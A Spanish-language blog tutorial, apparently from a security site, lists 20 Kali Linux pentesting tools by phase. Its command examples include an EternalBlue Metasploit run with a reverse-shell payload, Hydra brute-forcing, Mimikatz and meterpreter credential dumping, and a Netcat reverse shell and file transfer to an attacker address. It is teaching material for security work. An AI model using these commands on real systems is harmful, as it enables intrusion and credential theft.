ETHICAL HACKING#kali-linux#herramientas#pentesting#metasploit#burpsuite

Kali Linux: Las 20 Herramientas Esenciales para Pentesting

Explora las herramientas más importantes de Kali Linux para pentesting profesional: desde reconocimiento hasta post-explotación. Guía práctica con ejemplos reales.

4 min✍️ CyberFlows Team

¿Por qué Kali Linux?

Kali Linux es la distribución de referencia para seguridad ofensiva. Viene preinstalada con más de 600 herramientas organizadas por categorías. Aquí están las 20 más importantes para un pentest profesional.


Fase 1: Reconocimiento

1. Nmap — Escaneo de redes

# Escaneo completo
sudo nmap -sV -sC -O -p- 192.168.1.1 -oA resultado

2. theHarvester — OSINT de dominios

# Recopilar emails, subdominios, IPs
theHarvester -d empresa.com -b all -l 500

3. Maltego — Visualización de relaciones

Herramienta gráfica para mapear relaciones entre entidades (dominios, IPs, personas, organizaciones). Ideal para OSINT avanzado.

4. Shodan CLI — Internet de las cosas expuesto

# Instalar
pip install shodan

# Buscar dispositivos vulnerables (solo con API key)
shodan search "apache 2.4.49" --fields ip_str,port,org

Fase 2: Escaneo de vulnerabilidades

5. Nikto — Escáner web

# Escaneo básico de servidor web
nikto -h https://target.com

# Con autenticación
nikto -h https://target.com -id usuario:password

6. OpenVAS / GVM — Escáner de vulnerabilidades

# Iniciar servicio
sudo gvm-start

# Acceder vía web: https://127.0.0.1:9392

7. Gobuster — Descubrimiento de directorios

# Fuerza bruta de directorios
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Subdominios
gobuster dns -d target.com -w /usr/share/wordlists/dns.txt

Fase 3: Explotación

8. Metasploit Framework

# Iniciar consola
msfconsole

# Buscar exploit
msf6 > search eternalblue

# Usar un módulo
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit > set RHOSTS 192.168.1.100
msf6 exploit > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit > set LHOST 192.168.1.50
msf6 exploit > run

9. SQLMap — Inyección SQL automatizada

sqlmap -u "https://target.com/?id=1" --dbs --batch

10. Hydra — Fuerza bruta de credenciales

# SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# HTTP login form
hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"

11. John the Ripper — Cracking de hashes

# Crackear hash NTLM
echo "hash_ntlm" > hash.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Mostrar resultados
john --show hash.txt

12. Hashcat — GPU cracking

# MD5 con diccionario
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

# SHA-256 con reglas
hashcat -m 1400 hash.txt rockyou.txt -r rules/best64.rule

Fase 4: Post-explotación

13. Meterpreter (Metasploit)

# Una vez con sesión abierta
meterpreter > sysinfo
meterpreter > getuid
meterpreter > hashdump          # Extraer hashes
meterpreter > screenshot        # Captura de pantalla
meterpreter > download archivo  # Descargar archivo
meterpreter > shell             # Shell del sistema

14. Mimikatz — Extracción de credenciales Windows

# En shell de Windows comprometido
privilege::debug
sekurlsa::logonpasswords    # Credenciales en memoria
lsadump::sam                # Hashes SAM

Fase 5: Análisis web

15. Burp Suite — Proxy de intercepción web

La herramienta más importante para pentesting web:

  • Intercepta y modifica requests HTTP/S
  • Scanner de vulnerabilidades (Pro)
  • Repeater para pruebas manuales
  • Intruder para fuerza bruta
# Iniciar Burp Suite Community
burpsuite &

16. OWASP ZAP — Alternativa gratuita a Burp

zaproxy &
# O modo línea de comandos
zap-cli quick-scan -s all https://target.com

17. WPScan — WordPress específico

# Enumerar usuarios y plugins
wpscan --url https://target.com --enumerate u,p,t

# Con API key para vulnerabilidades
wpscan --url https://target.com --api-token TU_TOKEN

Fase 6: Análisis de red

18. Wireshark — Análisis de paquetes

# Captura en interfaz eth0
sudo wireshark &

# Filtros útiles:
# http.request.method == "POST"  → Ver forms
# tcp.port == 443               → HTTPS
# dns                            → Consultas DNS

19. Aircrack-ng — WiFi

# Poner en modo monitor
sudo airmon-ng start wlan0

# Capturar handshakes
sudo airodump-ng wlan0mon

# Crackear WPA2
aircrack-ng -w rockyou.txt captura.cap

20. Netcat — La navaja suiza de redes

# Listener (recibir conexión)
nc -lvnp 4444

# Shell reversa (en víctima)
nc 192.168.1.50 4444 -e /bin/bash

# Transferir archivos
# Receptor:
nc -lvnp 4444 > archivo.txt
# Emisor:
nc 192.168.1.50 4444 < archivo.txt

Resumen por fase

Fase Herramientas clave
Reconocimiento Nmap, theHarvester, Shodan
Escaneo Nikto, Gobuster, OpenVAS
Explotación Metasploit, SQLMap, Hydra
Post-explotación Meterpreter, Mimikatz
Web Burp Suite, ZAP, WPScan
Red Wireshark, Aircrack-ng, Netcat

Conclusión

Kali Linux es un ecosistema completo para seguridad ofensiva. La clave no está en conocer todas las herramientas, sino en entender cuándo y cómo usar cada una dentro de una metodología estructurada. Practica siempre en entornos legales como HackTheBox o TryHackMe.

📚 Fuentes y Referencias

⚠️ Aviso legal: Este contenido es estrictamente educativo e informativo. CyberSecHub no apoya ni facilita actividades ilegales. Toda la información debe utilizarse únicamente en entornos autorizados y legales.